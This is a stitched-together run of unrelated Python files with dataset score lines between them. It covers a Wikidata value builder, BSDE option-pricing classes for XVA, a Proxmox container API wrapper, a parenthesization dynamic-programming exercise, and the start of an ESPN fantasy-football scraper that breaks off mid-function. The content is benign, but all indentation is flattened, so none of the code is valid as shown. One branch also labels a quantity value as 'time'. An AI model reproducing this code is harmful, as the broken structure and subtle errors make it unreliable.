elif type(value) == str:
return {"value": {"value": value}, "type": "string"}
else:
raise TypeError(
f"Can not convert type {type(value)} to datatype {datatype}"
)
elif datatype == "monolingualtext":
if type(value) == dict:
return {"value": value, "type": "monolingualtext"}
else:
raise TypeError(
f"Can not convert type {type(value)} to datatype {datatype}"
)
elif datatype == "globe-coordinate":
if type(value) == dict:
return {"value": value, "type": "globecoordinate"}
else:
raise TypeError(
f"Can not convert type {type(value)} to datatype {datatype}"
)
elif datatype == "quantity":
if type(value) == dict:
return {"value": value, "type": "quantity"}
if type(value) in [int, float]:
valueObj = {
"amount": "%+f" % value,
"unit": "1",
}
return {"value": valueObj, "type": "time"}
else:
raise TypeError(
f"Can not convert type {type(value)} to datatype {datatype}"
)
elif datatype == "time":
if type(value) == dict:
return {"value": value, "type": "time"}
if type(value) == datetime:
cleanedDateTime = value.replace(hour=0, minute=0, second=0, microsecond=0)
valueObj: Dict[str, Any] = {
"time": "+" + cleanedDateTime.isoformat() + "Z",
"timezone": 0,
"before": 0,
"after": 0,
"precision": 11,
"calendarmodel": "http://www.wikidata.org/entity/Q1985727",
}
return {"value": valueObj, "type": "time"}
else:
raise TypeError(
f"Can not convert type {type(value)} to datatype {datatype}"
)
else:
raise NotImplementedError(f"Datatype {datatype} not implemented")
def buildSnak(propertyId: str, value):
datatype = getPropertyType(propertyId)
datavalue = buildDataValue(datatype, value)
return {
"snaktype": "value",
"property": propertyId,
"datavalue": datavalue,
"datatype": datatype,
}
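
# Hedged example (added for illustration; P1476 is Wikidata's "title"
# property, datatype "monolingualtext", so the value must already follow the
# Wikibase JSON shape):
#
#     snak = buildSnak("P1476", {"text": "Example", "language": "en"})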
| 2.484375 | 2 |
example_xva_v2.py | kwchau/sgbm_xva | 6 | 12797501 |
"""
Created on Mon May 14 17:21:26 2018
@author: <NAME>
This file holds the parameters for each specific example and the numerical scheme
for the BSDE.
.. todo:: Move the numerical scheme to the function file
"""
import numpy as np
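
# Hedged reading note (added, not in the original file): the classes below
# discretise a BSDE of the form
#     dY_t = -f(t, Y_t, Z_t) dt + Z_t dW_t,   Y_T = g(X_T)
# with a theta-scheme. riskfree_scheme_price / riskfree_scheme_delta step the
# price Y and the delta Z backwards one time step from regression
# coefficients, and numerical_scheme layers the funding / variation-margin
# (XVA) adjustment on top of the risk-free solution.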
class GermenIndexPut():
# Example Information
name = "Put option for a 5 stocks German index model"
dimension = 5
# Stock parameters
stock_model = "BS"
initial_value = np.array([0.01, 0.01, 0.01, 0.01, 0.01])
num_of_assets = 5
num_of_brownian_motion = 5
mu_bar = 0.05 * np.ones(num_of_assets, dtype=float)
sigma_bar = np.array([0.518, 0.648, 0.623, 0.570, 0.530])
cholesky_decomposition = np.array([[1., 0., 0., 0., 0.],\
[0.79, 0.613107, 0., 0., 0.],\
[0.82, 0.134071, 0.556439, 0., 0.],\
[0.91, 0.132277, 0.0109005, 0.39279, 0.],\
[0.84, 0.157232, 0.0181865, 0.291768, 0.429207]])
cholesky_inverse = np.linalg.inv(cholesky_decomposition)
# Market parameters and functions
riskless_rate = 0.05
divident_yield = np.zeros(num_of_assets, dtype=float)
bank_bond_yield = 0
counterparty_bond_yield = 0
counterparty_bond_repo_rate = 0
variation_margin_interest_rate = 0.1
stock_repo_rate = 0.07 * np.ones(num_of_assets, dtype=float)
def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process):
temp = \
(1 - (1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\
- delta_t * theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\
- delta_t * (1 - theta[0]) * np.einsum('i, ji, jk, lk -> l',
(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis)
return temp / (1 + rate * delta_t * theta[0])
def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient):
riskfree_delta = \
- (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\
+ (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\
- delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm', \
(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis)
return riskfree_delta
def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis):
riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :])
riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta)
adjusted_delta = \
self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\
+ (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis)
adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\
+ delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\
riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\
+ delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\
np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])
return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1))
# Product parameters
weight = np.array([38.1, 6.5, 5.7, 27.0, 22.7], dtype=np.double)
strike = 1.
terminal_time = 1.
buy_sell = -1.
put_call = "Put"
# Regression functions and parameters
sorting_method = "Intrinsic Value"
basis = "Intrinsic Value"
basis_order = 3
no_of_regression = 1 + 5 + 1 + 5
def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta):
rec = np.empty((no_of_samples, self.no_of_regression))
rec[:,0] = derivative.reshape(-1)
for i in range(1,6):
rec[:, i] = delta[:, i-1]
rec[:, 6] = adjusted_derivative.reshape(-1)
for i in range(7,12):
rec[:, i] = adjusted_delta[:, i-7]
return rec
# Reference Solution
reference_riskfree = False
reference_riskfree_price = -0.175866
refererce_adjust = False
class ArithmeticBasketPut():
def __init__(self, dimension):
# Example Information
self.name = "Arithmetic basket put option for BS model"
self.dimension = dimension
# Market parameters and functions
self.riskless_rate = 0.06
self.bank_bond_yield = 0.
self.counterparty_bond_yield = 0.
self.counterparty_bond_repo_rate = 0.
self.variation_margin_interest_rate = 0.1
self.stock_repo_rate = 0.06 * np.ones(dimension, dtype=float)
# Stock parameters
self.stock_model = "BS"
self.initial_value = 40. * np.ones(dimension)
self.num_of_assets = dimension
self.num_of_brownian_motion = dimension
self.divident_yield = np.zeros(dimension, dtype=float)
self.mu_bar = self.riskless_rate - self.divident_yield
self.sigma_bar = 0.2 * np.ones(dimension)
self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25 * np.ones((dimension, dimension))
self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix)
self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition)
# Product parameters
self.weight = 1/dimension * np.ones(dimension, dtype=np.single)
self.strike = 40.
self.terminal_time = 1.
self.buy_sell = 1.
self.put_call = "Put"
# Regression functions and parameters
self.sorting_method = "Intrinsic Value"
self.basis = "Intrinsic Value"
self.basis_order = 3
self.no_of_regression = 1 + self.num_of_brownian_motion + 1 + self.num_of_brownian_motion
def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process):
temp = \
(1 - (1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\
- delta_t * theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\
- delta_t * (1 - theta[0]) * np.einsum('i, ji, jk, lk -> l',
(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis)
return temp / (1 + rate * delta_t * theta[0])
def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient):
riskfree_delta = \
- (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\
+ (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\
- delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm', \
(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis)
return riskfree_delta
def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis):
riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :])
riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:1+self.num_of_brownian_motion, :], riskfree_delta)
adjusted_delta = \
self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion,:],
regression_coeff[2 + self.num_of_brownian_motion: 2+2* self.num_of_brownian_motion, :])\
+ (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis)
adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[1+self.num_of_brownian_motion, :],
regression_coeff[2+self.num_of_brownian_motion:2+2*self.num_of_brownian_motion, :], adjusted_delta)\
+ delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\
riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\
+ delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\
np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])
return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1))
def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta):
rec = np.empty((no_of_samples, self.no_of_regression))
rec[:,0] = derivative.reshape(-1)
for i in range(self.num_of_brownian_motion):
rec[:, i+1] = delta[:, i]
rec[:, 1+self.num_of_brownian_motion] = adjusted_derivative.reshape(-1)
for i in range(self.num_of_brownian_motion):
rec[:, i + 2 +self.num_of_brownian_motion] = adjusted_delta[:, i]
return rec
# Reference Solution
reference_riskfree = False
refererce_adjust = False
# Under development
class GeometicBasketPut():
def __init__(self, dimension):
# Market parameters and functions
self.riskless_rate = 0.06
self.bank_bond_yield = 0.
self.counterparty_bond_yield = 0.
self.counterparty_bond_repo_rate = 0.
self.variation_margin_interest_rate = 0.1
self.stock_repo_rate = 0.07 * np.ones(dimension, dtype=float)
# Stock parameters
self.stock_model = "BS"
self.initial_value = 40. * np.ones(dimension)
self.num_of_assets = dimension
self.num_of_brownian_motion = dimension
self.divident_yield = np.zeros(dimension, dtype=float)
self.mu_bar = self.riskless_rate - self.divident_yield
self.sigma_bar = 0.2 * np.ones(dimension)
self.correlation_matrix = 0.75 * np.identity(dimension) + 0.25 * np.ones((dimension, dimension))
self.cholesky_decomposition = np.linalg.cholesky(self.correlation_matrix)
self.cholesky_inverse = np.linalg.inv(self.cholesky_decomposition)
# Product parameters
self.weight = 1/dimension * np.ones(dimension, dtype=np.single)
self.strike = 40.
self.terminal_time = 1.
self.buy_sell = 1.
self.put_call = "Put"
def riskfree_scheme_price(self, theta, delta_t, expect_basis, rate, price_coefficient, delta_coefficient, delta_process):
temp = \
(1 - (1-theta[0]) * rate * delta_t) * np.einsum('j, ij-> i',price_coefficient, expect_basis)\
- delta_t * theta[0] * np.einsum('i, ji, kj -> k', (self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_process)\
- delta_t * (1 - theta[0]) * np.einsum('i, ji, jk, lk -> l',
(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_basis)
return temp / (1 + rate * delta_t * theta[0])
def riskfree_scheme_delta(self, theta, delta_t, expect_basis, expect_brownian_basis, rate, price_coefficient, delta_coefficient):
riskfree_delta = \
- (1-theta[1]) * (1/theta[1]) * np.einsum('ij, kj ->ik', expect_basis, delta_coefficient)\
+ (1/theta[1]) * (1-(1-theta[1]) * rate * delta_t) * np.einsum('j, ijk-> ik', price_coefficient, expect_brownian_basis)\
- delta_t * (1-theta[1]) * (1/theta[1]) * np.einsum('i, ji, jk, lkm -> lm', \
(self.mu_bar + self.divident_yield - self.stock_repo_rate)/self.sigma_bar, self.cholesky_inverse, delta_coefficient, expect_brownian_basis)
return riskfree_delta
def numerical_scheme(self, theta, delta_t, regression_coeff, expect_basis, expect_brownian_basis):
riskfree_delta = self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.riskless_rate, regression_coeff[0, :], regression_coeff[1:6, :])
riskfree_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.riskless_rate , regression_coeff[0, :], regression_coeff[1:6, :], riskfree_delta)
adjusted_delta = \
self.riskfree_scheme_delta(theta, delta_t, expect_basis, expect_brownian_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :])\
+ (1/theta[1]) * (1-theta[1]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) * delta_t * np.einsum('j, ijk-> ik', regression_coeff[0, :], expect_brownian_basis)
adjusted_price = self.riskfree_scheme_price(theta, delta_t, expect_basis, self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate , regression_coeff[6, :], regression_coeff[7:12, :], adjusted_delta)\
+ delta_t * theta[0] * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\
riskfree_price/ (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])\
+ delta_t * (1 - theta[0]) * (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate + self.variation_margin_interest_rate) *\
np.einsum('j, ij-> i', regression_coeff[0, :], expect_basis) / (1 + (self.bank_bond_yield + self.counterparty_bond_yield - self.counterparty_bond_repo_rate) * delta_t * theta[0])
return riskfree_delta, riskfree_price.reshape((-1, 1)), adjusted_delta, adjusted_price.reshape((-1, 1))
# Regression functions and parameters
sorting_method = "Geometric Intrinsic Value"
basis = "Geometric Intrinsic Value"
basis_order = 2
no_of_regression = 1 + 5 + 1 + 5
def regression_variable(self, no_of_samples, derivative, delta, adjusted_derivative, adjusted_delta):
rec = np.empty((no_of_samples, self.no_of_regression))
rec[:,0] = derivative.reshape(-1)
for i in range(1,6):
rec[:, i] = delta[:, i-1]
rec[:, 6] = adjusted_derivative.reshape(-1)
for i in range(7,12):
rec[:, i] = adjusted_delta[:, i-7]
return rec
# Reference Solution
reference_riskfree = False
refererce_adjust = False
Example = ArithmeticBasketPut(5)
| 2.46875 | 2 |
proxmoxmanager/utils/classes/containers.py | igorlitvak/proxmoxmanager | 0 | 12797502 | from ..api import APIWrapper
from .nodes import ProxmoxNode, ProxmoxNodeDict
from .users import ProxmoxUser
from typing import Dict, List, Tuple, Any, Union
class ProxmoxContainer:
def __init__(self, api: APIWrapper, vmid: str, node: str):
self._api = api
self._vmid = vmid
self._node = node
@property
def id(self) -> str:
"""
:return: Unique ID of container (get-only)
"""
return self._vmid
@property
def node(self) -> ProxmoxNode:
"""
:return: Node on which containers is located (get-only)
"""
return ProxmoxNode(self._api, self._node)
def get_status_report(self) -> Dict[str, Any]:
"""
Get detailed status info about this container
:return: Container info in JSON-like format
"""
return self._api.get_container_status(node=self._node, vmid=self._vmid)
def get_config(self) -> Dict[str, Any]:
"""
Get detailed config
:return: Container config in JSON-like format
"""
return self._api.get_container_config(node=self._node, vmid=self._vmid)
def running(self) -> bool:
"""
Whether container is currently running
:return: True/False
"""
config = self.get_status_report()
return "status" in config.keys() and config["status"] == "running"
def is_template(self) -> bool:
"""
Whether this container is a template
:return: True/False
"""
config = self.get_config()
return "template" in config.keys() and config["template"] == 1
def clone(self, newid: Union[str, int], newnode: Union[str, ProxmoxNode] = None, name: str = None,
full: bool = True) -> str:
"""
Clone LXC container
:param newid: ID of new LXC (integer number 100-999999999)
:param newnode: New node ID or ProxmoxNode object (optional)
:param name: Name of new LXC (optional)
:param full: Whether to make storage unlinked (note that linked might not be supported) (optional, default=True)
:return: ID of cloning task
"""
try:
newid = int(newid)
except ValueError:
raise ValueError("ID of container should be an integer between 100 and 999999999")
if newid < 100 or newid > 999_999_999:
raise ValueError("ID of container should be an integer between 100 and 999999999")
newid = str(newid)
kwargs = {"newid": newid, "node": self._node, "vmid": self._vmid, "full": '1' if full else '0'}
if newnode is not None:
if isinstance(newnode, ProxmoxNode):
newnode = newnode.id
kwargs["target"] = newnode
if name is not None:
kwargs["hostname"] = name
return self._api.clone_container(**kwargs)
def delete(self) -> str:
"""
Delete this container
:return: ID of deleting task
"""
return self._api.delete_container(node=self._node, vmid=self._vmid)
def start(self) -> str:
"""
Start container
:return: ID of task
"""
kwargs = {"node": self._node, "vmid": self._vmid}
return self._api.start_container(**kwargs)
def stop(self) -> str:
"""
Stop container (unsafely)
:return: ID of task
"""
kwargs = {"node": self._node, "vmid": self._vmid}
return self._api.stop_container(**kwargs)
def shutdown(self, timeout: int = None, force_stop: bool = True) -> str:
"""
Shutdown container (safely)
:param timeout: Number of seconds to wait (optional)
:param force_stop: Whether to stop a container if shutdown failed (optional, default=True)
:return: ID of task
"""
kwargs = {"node": self._node, "vmid": self._vmid, "forceStop": '1' if force_stop else '0'}
if timeout is not None:
kwargs["timeout"] = str(timeout)
return self._api.shutdown_container(**kwargs)
def reboot(self, timeout: int = None) -> str:
"""
Reboot container (safely)
:param timeout: Number of seconds to wait (optional)
:return: ID of task
"""
kwargs = {"node": self._node, "vmid": self._vmid}
if timeout is not None:
kwargs["timeout"] = str(timeout)
return self._api.reboot_container(**kwargs)
def suspend(self) -> str:
"""
Suspend container
WARNING: doesn't appear in Proxmox GUI and probably never works
:return: ID of task
"""
kwargs = {"node": self._node, "vmid": self._vmid}
return self._api.suspend_container(**kwargs)
def resume(self) -> str:
"""
Resume container
WARNING: doesn't appear in Proxmox GUI and probably never works
:return: ID of task
"""
kwargs = {"node": self._node, "vmid": self._vmid}
return self._api.resume_container(**kwargs)
def view_permissions(self) -> List[Tuple[ProxmoxUser, str]]:
"""
Get a list of users with permissions for this container and their roles
:return: List of tuples of ProxmoxUser objects and string names of roles
"""
path = "/vms/" + self._vmid
resp = self._api.get_access_control_list()
return [(ProxmoxUser(self._api, el["ugid"].split("@")[0]), el["roleid"]) for el in resp if
el["path"] and el["type"] == "user" and el["ugid"].split("@")[1] == "pve" and el["path"] == path]
def add_permission(self, user: Union[str, ProxmoxUser], role: str) -> None:
"""
Add new permission for this container
:param user: User ID or ProxmoxUser object
:param role: String name of the role
:return: None
"""
path = "/vms/" + self._vmid
if isinstance(user, ProxmoxUser):
user = user.id
self._api.update_access_control_list(path=path, roles=role, users=user + "@pve", delete="0", propagate="0")
def remove_permission(self, user: Union[str, ProxmoxUser], role: str) -> None:
"""
Remove permission for this container
:param user: User ID or ProxmoxUser object
:param role: String name of the role
:return: None
"""
path = "/vms/" + self._vmid
if isinstance(user, ProxmoxUser):
user = user.id
self._api.update_access_control_list(path=path, roles=role, users=user + "@pve", delete="1", propagate="0")
def remove_all_permissions(self) -> None:
"""
Remove all permissions for this container for all users with any role
:return: None
"""
for user, permission in self.view_permissions():
self.remove_permission(user, permission)
def __repr__(self):
return f"<{self.__class__.__name__}: {self._vmid}>"
def __str__(self):
return self._vmid
def __eq__(self, other: 'ProxmoxContainer'):
return self._vmid == other._vmid and self._node == other._node
class ProxmoxContainerDict:
def __init__(self, api: APIWrapper):
self._api = api
self._containers: Dict[str, ProxmoxContainer] = {}
def keys(self):
self._get_containers()
return self._containers.keys()
def values(self):
self._get_containers()
return self._containers.values()
def items(self):
self._get_containers()
return self._containers.items()
def remove(self, vmid: Union[str, int]) -> None:
"""
Remove container by ID
:param vmid: Container ID
:return: None
"""
vmid = str(vmid)
self._get_containers()
self._containers[vmid].delete()
def __len__(self):
self._get_containers()
return len(self._containers)
def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer:
key = str(key)
self._get_containers()
return self._containers[key]
def __iter__(self):
self._get_containers()
return iter(self._containers)
def __repr__(self):
self._get_containers()
return f"<{self.__class__.__name__}: {repr(self._containers)}>"
def _get_containers(self):
containers = []
for node in ProxmoxNodeDict(self._api).keys():
resp = self._api.list_containers(node)
containers += [ProxmoxContainer(self._api, str(cont["vmid"]), node) for cont in resp]
self._containers = {cont.id: cont for cont in containers}
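

# Hedged usage sketch (added for illustration; the APIWrapper construction is
# an assumption, not taken from this module):
#
#     api = APIWrapper(...)                  # authenticated Proxmox client
#     containers = ProxmoxContainerDict(api)
#     ct = containers[101]                   # lookup by VMID (str or int)
#     task_id = ct.clone(newid=102, name="clone-of-101", full=True)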
| 2.328125 | 2 |
1-6 Algorithmic Toolbox/Week 6/6-3 placing_parentheses.py | MLunov/Data-Structures-and-Algorithms-Specialization-San-Diego-HSE | 0 | 12797503 | # Uses python3
def evalt(a, b, op):
if op == '+':
return a + b
elif op == '-':
return a - b
elif op == '*':
return a * b
else:
assert False
def MinAndMax(i, j):
MIN = float('inf')
MAX = float('-inf')
for k in range(i, j):
a = evalt(M[i][k], M[k + 1][j], op[k - 1])
b = evalt(M[i][k], m[k + 1][j], op[k - 1])
c = evalt(m[i][k], M[k + 1][j], op[k - 1])
d = evalt(m[i][k], m[k + 1][j], op[k - 1])
MIN = min(MIN, a, b, c, d)
MAX = max(MAX, a, b, c, d)
return (MIN, MAX)
dataset = list(input())
digits = [int(dataset[i]) for i in range(0, len(dataset), 2)]
op = [dataset[i] for i in range(1, len(dataset), 2)]
m, M, n = [], [], len(digits)
for i in range(n + 1):
m.append([])
M.append([])
for j in range(n + 1):
m[i].append(0)
M[i].append(0)
for i in range(1, n + 1):
m[i][i], M[i][i] = digits[i - 1], digits[i - 1]
for s in range(1, n):
for i in range(1, n + 1 - s):
j = i + s
m[i][j], M[i][j] = MinAndMax(i, j)
# print(m)
# print(M)
print(M[1][n])
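
# Hedged worked example (added): for the classic course input "5-8+7*4-8+9"
# the maximum achievable value is 200, e.g. (5 - ((8 + 7) * (4 - (8 + 9)))),
# so running this script on that input line should print 200.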
| 3.15625 | 3 |
nfl/espn.py | sansbacon/nfl | 2 | 12797504 | """
# espn.py
# classes for scraping, parsing espn football data
# this does include some basic fantasy data
# espn_fantasy is mostly about managing fantasy teams
# NOTE: trouble accessing data in offseason
# will have to revisit this module as season approaches
"""
import logging
import re
from bs4 import BeautifulSoup, NavigableString, Tag
from namematcher.xref import Site
from sportscraper.scraper import RequestScraper
FANTASY_TEAMS = {
1: "Atl",
2: "Buf",
3: "Chi",
4: "Cin",
5: "Cle",
6: "Dal",
7: "Den",
8: "Det",
9: "GB",
10: "Ten",
11: "Ind",
12: "KC",
13: "Oak",
14: "LAR",
15: "Mia",
16: "Min",
17: "NE",
18: "NO",
19: "NYG",
20: "NYJ",
21: "Phi",
22: "Ari",
23: "Pit",
24: "LAC",
25: "SF",
26: "Sea",
27: "TB",
28: "Wsh",
29: "Car",
30: "Jax",
33: "Bal",
34: "Hou",
}
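

# Added helper sketch (hypothetical, not part of the original module): the
# integers above appear to be ESPN "proTeamId" codes, so a small lookup with
# a safe default resolves them to team abbreviations.
def team_abbrev(pro_team_id):
    return FANTASY_TEAMS.get(pro_team_id, "")
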
class Scraper(RequestScraper):
"""
Scrape ESPN.com for football stats
"""
@staticmethod
def _check_pos(pos):
"""
Makes sure pos is valid and uppercase
Args:
pos(str):
Returns:
str
"""
if pos in [
"qb",
"rb",
"wr",
"te",
"dst",
"d/st",
"k",
"QB",
"RB",
"WR",
"TE",
"K",
"D/ST",
"DST",
]:
if pos in ["DST", "dst"]:
pos = "D/ST"
return pos.upper()
else:
raise ValueError("invalid position: {}".format(pos))
def adp(self, season_year):
"""
Gets adp data
Args:
season_year(int): 2019, etc.
Returns:
dict: parsed JSON
"""
url = (
f"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/"
f"segments/0/leaguedefaults/1?view=kona_player_info"
)
return self.get_json(url)
def players_position(self, pos):
"""
Gets page with all players by position
Args:
pos(str): qb, rb, wr, te, k, etc.
Returns:
str
"""
url = "http://www.espn.com/nfl/players?position={}&league=nfl"
return self.get(url.format(pos), encoding="latin1")
def projections(self, pos, season_year=None, week=0, offset=0):
"""
Gets page with projections by position
Args:
pos: str qb, rb, wr, te, k, etc.
season_year: int 2017, 2016
week: int 1, 2, 3
offset: int 0, 40, 80, etc.
Returns:
HTML string
TODO: revise based on new URL
"""
pos = pos.lower()
slot_categories = {"qb": 0, "rb": 2, "wr": 4, "te": 6, "dst": 16, "k": 17}
max_offset = {"qb": 120, "rb": 240, "wr": 360, "te": 160, "dst": 0, "k": 40}
if pos not in slot_categories.keys():
raise ValueError("invalid pos {}".format(pos))
if offset > max_offset.get(pos):
raise ValueError("invalid offset {}".format(offset))
if offset % 40 > 0:
raise ValueError("invalid offset {}".format(offset))
# https://fantasy.espn.com/football/players/projections
url = "http://games.espn.com/ffl/tools/projections?"
if season_year:
params = {
"slotCategoryId": slot_categories[pos],
"startIndex": offset,
"seasonId": season_year,
}
else:
params = {"slotCategoryId": slot_categories[pos], "startIndex": offset}
if week:
params["scoringPeriodId"] = week
else:
params["seasonTotals"] = "true"
return self.get(url, params=params, encoding="latin1")
def team_roster(self, team_code):
"""
Gets list of NFL players from ESPN.com
Args:
team_code: str 'DEN', 'BUF', etc.
Returns:
HTML string
"""
url = f"http://www.espn.com/nfl/team/roster/_/name/{team_code}"
return self.get(url, encoding="latin1")
def weekly_scoring(self, season_year, week, position):
"""
Gets weekly fantasy scoring page
Args:
season_year (int): 2017, 2016, etc.
week (int): 1 through 17
position (str): 'qb', 'wr', etc.
Returns:
str: HTML
TODO: rework for new URL
"""
poscode = {"qb": 0, "rb": 2, "wr": 4, "te": 6, "dst": 16, "k": 17}
if position.lower() not in poscode:
raise ValueError("invalid position: {}".format(position))
# https://fantasy.espn.com/football/leaders
url = "http://games.espn.com/ffl/leaders?&"
params = {
"scoringPeriodId": week,
"seasonId": season_year,
"slotCategoryId": position,
}
return self.get(url, params=params)
class Parser:
"""
Parse ESPN.com for football stats
"""
def __init__(self):
"""
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
@staticmethod
def _val(val):
"""
Converts non-numeric value to numeric 0
Args:
val:
Returns:
number
"""
if "--" in val:
return 0
return val
@staticmethod
def adp(content):
"""
Parses season-long ADP
Args:
content:
Returns:
list of dict
"""
vals = []
for item in content["players"]:
tl_wanted = [
"defaultPositionId",
"firstName",
"id",
"lastName",
"proTeamId",
]
api_player = {k: v for k, v in item["player"].items() if k in tl_wanted}
for scoring_type in ["PPR", "STANDARD"]:
for rank_type in ["rank", "auctionValue"]:
key = scoring_type.lower() + "_" + rank_type
try:
api_player[key] = item["player"]["draftRanksByRankType"][
scoring_type
][rank_type]
except KeyError:
api_player[key] = None
vals.append(api_player)
return vals
def projections(self, content, pos):
"""
Parses ESPN fantasy football season-long sortable projections page
Args:
content: HTML string
Returns:
list of dict
"""
players = []
soup = BeautifulSoup(content, "lxml")
if pos.lower() in ["qb", "rb", "wr", "te", "flex"]:
headers = [
"pass_att",
"pass_cmp",
"pass_yds",
"pass_td",
"pass_int",
"rush_att",
"rush_yds",
"rush_td",
"rec",
"rec_yds",
"rec_td",
"fantasy_points_ppr",
]
for row in soup.findAll("tr", {"class": "pncPlayerRow"}):
player = {"source": "espn"}
tds = row.find_all("td")
# tds[0]: rank
player["source_position_rank"] = tds[0].text
# tds[1]: name/team/pos
link, navstr = list(tds[1].children)[0:2]
player["source_player_name"] = link.text
player["source_player_team"], player[
"source_player_position"
] = navstr.split()[-2:]
